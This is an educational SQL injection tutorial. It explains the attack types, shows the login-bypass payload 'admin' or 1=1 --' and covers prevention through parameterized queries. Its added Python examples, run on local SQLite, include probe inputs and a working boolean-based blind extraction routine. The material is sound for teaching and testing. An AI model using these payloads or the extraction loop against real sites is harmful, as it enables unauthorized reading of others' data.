SQL Injection Tutorial

What Is SQL Injection?

SQL injection is a technique attackers use to get at your data. It involves taking advantage of user inputs on web pages (or any other input an application accepts) in order to execute SQL statements of the attacker's choosing against your database.

If the input is concatenated into a query without being parameterized or properly validated, the hacker can enter carefully constructed data so that the SQL executed against your database is altered to have unintended consequences (from your point of view; the consequences are obviously intended from the hacker's perspective!). These consequences could be the hacker reading your confidential data, bypassing a login, modifying or wiping your data, and so on.

SQL injection is one of the most common web application attacks, so it's important that it's understood and tested for by developers and by those responsible for security. This quick SQL injection tutorial is intended to give a brief and easy to understand overview of the issue.

Types Of SQL Injection

There are three general types of SQL injection attacks:

  • In-band SQL injection – the hacker changes or redirects the query and the result comes back in the application's normal response, either as data shown on the web page (for example, extra rows appended with a UNION) or as a database error message. The SQL injection example below is in-band.
  • Out-of-band SQL injection – the data is retrieved through a different channel than the application's response. For example, if an administrator has configured the database to email them when certain events occur, a hacker can use that email functionality to email themselves the data; database features that make DNS or HTTP requests can be used the same way.
  • Blind SQL injection – nothing from the query is shown directly, so the hacker asks the database questions that have a true or false answer and deduces information from how the application responds: a page that changes depending on the answer, or, if the page looks the same either way, a time delay triggered only when the answer is true.

SQL Injection Example

As a SQL injection example, consider a web application login screen where the user is prompted to enter their username and password. The application will then build a SQL query using the entered data such as:

"select username, password from users where username = '" + entered_username + "' and password = '" + entered_password + "';"

So the end result will be a query such as:

select username, password from users where username = 'Dave' and password = 'DBADave';

Now if the application builds this SQL query by concatenation, without parameterizing or validating the data entered, then the hacker could enter the following for both the username and the password:

admin' or 1=1 --

(The -- part may not display well in a browser, but it is two ASCII hyphens. In SQL that begins a comment that runs to the end of the line, so you are effectively commenting out the rest of the SQL statement. In MySQL the two dashes must be followed by whitespace for the comment to be recognised, which is why the payload is usually written with a trailing space.)

This would then result in the SQL query looking like this:

select username, password from users where username = 'admin' or 1=1 -- ' and password = 'admin' or 1=1 --';

As the "1=1" part of the where clause is always true, every row matches and this query returns all records from the users table; the password check that followed the comment marker is never evaluated. An application that treats a non-empty result as a successful login will then sign the hacker in, typically as whichever user the database returns first.

Of course it’s important to remember that a login screen isn’t the only part of an application that’s vulnerable. Any screen that allows user input and then builds a query string to query the database is potentially vulnerable to SQL injection.

How To Prevent SQL Injection

The first thing developers can do to help prevent SQL injection is to use prepared statements with parameterized queries. The SQL text is sent to the database with placeholders and the entered values are supplied separately, so the database never parses them as SQL: the hacker is not able to execute any injected SQL because the literal value of the data they enter is passed as the parameter. In the above example, the application would look for a user literally named "admin' or 1=1 --" and find nothing. Stored procedures give the same result, but only when they are called with parameters and do not themselves build dynamic SQL from their arguments; a stored procedure that concatenates its inputs into a string and executes it is just as injectable. So it's not enough to say you used stored procedures and therefore your code is safe from SQL injection; you still need to consider security.

The input data can also be validated before the SQL query is built. For example, if a date value is expected to be input, check that a valid date has indeed been entered, and if a numeric id is expected, accept only digits. Validation is a second layer of defence rather than a replacement for parameterized queries, because free-text fields such as a surname can legitimately contain quotes (O'Brien) and must still be handled safely.
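The login example above, and the parameterized fix just described, as an added example using Python's built-in sqlite3 module (this is illustrative code written for this page, not the article's own application; the users table contents are constructed sample data). The vulnerable function concatenates the input exactly as the article's query does; the safe function sends the same query with placeholders and lets the driver pass the values separately.

```python
import sqlite3

# Constructed sample users; these rows are not from the original article.
USERS = [
    ("admin", "S3cretAdm1n"),
    ("Dave", "DBADave"),
    ("alice", "hunter2"),
]


def make_db():
    """Create an in-memory SQLite database with a users table like the article's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, entered_username, entered_password):
    """Build the query by string concatenation, as the article's example does.
    Whatever the user types becomes part of the SQL text."""
    sql = ("select username, password from users where username = '"
           + entered_username + "' and password = '" + entered_password + "';")
    return conn.execute(sql).fetchall()


def login_safe(conn, entered_username, entered_password):
    """Same lookup as a parameterized query. The SQL text is fixed; the driver
    passes the two values separately, so quotes and comment markers in the
    input are matched literally instead of being parsed as SQL."""
    sql = "select username, password from users where username = ? and password = ?"
    return conn.execute(sql, (entered_username, entered_password)).fetchall()


def demo():
    conn = make_db()
    payload = "admin' or 1=1 --"
    # Genuine credentials behave the same way in both versions.
    assert login_vulnerable(conn, "Dave", "DBADave") == [("Dave", "DBADave")]
    assert login_safe(conn, "Dave", "DBADave") == [("Dave", "DBADave")]
    # The injected value turns the concatenated query into
    #   ... where username = 'admin' or 1=1 -- ' and password = '...'
    # so the password check is commented out and every row comes back.
    stolen = login_vulnerable(conn, payload, payload)
    print("vulnerable login returned:", stolen)
    # The parameterized version looks for a user literally named "admin' or 1=1 --".
    print("parameterized login returned:", login_safe(conn, payload, payload))
    return stolen


if __name__ == "__main__":
    demo()
```

Running the script prints all three sample rows for the vulnerable login and an empty list for the parameterized one. The only difference between the two functions is where the user's data goes: into the SQL text, or into the parameter tuple.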

Testing If A Site Is Vulnerable To SQL Injection

When testing if a site is vulnerable to SQL injection, you have to make a list of every input whose data could potentially reach a query. This includes visible form fields, hidden form fields, URL parameters, cookies and HTTP headers, and the bodies of POST requests, including ones the browser sends without a visible form. Then each possibility needs to be individually tested.

Areas that are potentially vulnerable include authentication forms such as login screens and any field where the user can enter data that will be used to query the database.

When testing for vulnerability, the first test is normally to append a single quote (') to the end of the input data. If the value is being concatenated into a string literal, the extra quote unbalances the quoting and the database rejects the statement. A semicolon (;) is sometimes tried too, but it only affects the SQL if it lands outside a string literal, so the single quote is the more reliable probe.

What you are looking to see is whether the application constructs a query string from the entered data without validating it and without using prepared statements. If the application returns a database error, a stack trace, or shows some other behaviour that tracks the SQL meaning of the input rather than its plain value, your site is very likely vulnerable. The converse does not hold: an application that hides its errors can still be injectable, which is what the blind tests below are for.

Other data that can be used to test includes comment markers, boolean constructs such as AND 1=1 and AND 1=2 (a vulnerable page behaves like the original for the true condition and differently for the false one, even when no error is shown), and entering a text string into a field that is expecting a number, which is injectable if the application doesn't quote the value. Again, if the application displays a SQL error then your data is being used directly in the query and your application is vulnerable to SQL injection.

This is only a brief overview of the sort of testing you need to do (which is a lot!). Luckily there are tools available that can automate SQL injection testing for you, including some that run online.
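The probes described in this section, run against a simulated vulnerable page, as an added example that is not part of the original article. The endpoint, its products table and its error text are all assumptions constructed for the demonstration: it looks a product up by a numeric id that is concatenated unquoted into the query and shows database errors to the user. The example goes one step beyond the text by also showing the blind technique from the types list above, extracting a value one character at a time from nothing but true/false page differences.

```python
import sqlite3
import string

# Constructed sample catalogue; not from the original article.
PRODUCTS = [(1, "widget"), (2, "gadget"), (3, "sprocket")]


def make_catalogue():
    """In-memory SQLite database standing in for the site's real one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table products (id integer, name text)")
    conn.executemany("insert into products values (?, ?)", PRODUCTS)
    conn.commit()
    return conn


def product_page(conn, product_id):
    """Assumed vulnerable endpoint: the id is concatenated into the query
    without quoting or validation, and errors leak to the user.
    Returns (status, body) the way an HTTP response would."""
    sql = "select name from products where id = " + product_id
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, "Database error: " + str(exc)
    return 200, (", ".join(r[0] for r in rows) if rows else "No such product")


def probe(endpoint, baseline):
    """The article's manual checks, automated: compare each probe's response
    with the response for a known-good value. Returns a list of findings."""
    base_status, base_body = endpoint(baseline)
    findings = []
    for label, payload in (("single quote", baseline + "'"),
                           ("text in numeric field", "abc")):
        status, body = endpoint(payload)
        if status != base_status or "error" in body.lower():
            findings.append(label + ": error returned, input reaches the query unescaped")
    # Boolean pair: a true condition should leave the page unchanged and a
    # false one should change it. This works even when errors are hidden.
    _, true_body = endpoint(baseline + " and 1=1")
    _, false_body = endpoint(baseline + " and 1=2")
    if true_body == base_body and false_body != base_body:
        findings.append("boolean pair: page tracks the truth of injected conditions")
    return findings


def blind_extract(endpoint, baseline, subquery, alphabet=string.ascii_lowercase, max_len=32):
    """Boolean-based blind extraction: for each position ask 'is character N
    of the result equal to X?' and keep the answer for which the page looks
    like the baseline. The alphabet is deliberately small; a real test widens
    it or bisects on character codes to cut the number of requests."""
    _, base_body = endpoint(baseline)
    secret = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = f"{baseline} and substr(({subquery}),{pos},1)='{ch}'"
            if endpoint(payload)[1] == base_body:
                secret += ch
                break
        else:
            return secret  # no character matched: end of the value
    return secret


if __name__ == "__main__":
    conn = make_catalogue()

    def page(value):
        return product_page(conn, value)

    for finding in probe(page, "1"):
        print(finding)
    print("extracted:", blind_extract(page, "1", "select name from products where id = 3"))
```

Against this endpoint all three probes fire, and the blind extraction recovers the name of product 3 without that name ever appearing in a response; the only signal is whether the page for product 1 looks normal or not. Tools such as sqlmap automate exactly this loop, with larger alphabets, time-based variants for pages that never change, and database-specific syntax for the substring function.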

Open Source SQL Injection Testing Tools

Here’s a brief list of some of the available open source tools you can use for SQL injection testing:

BSQL Hacker
Mole
Safe3 SQL Injector
SQLmap
SQLninja
SQLSus
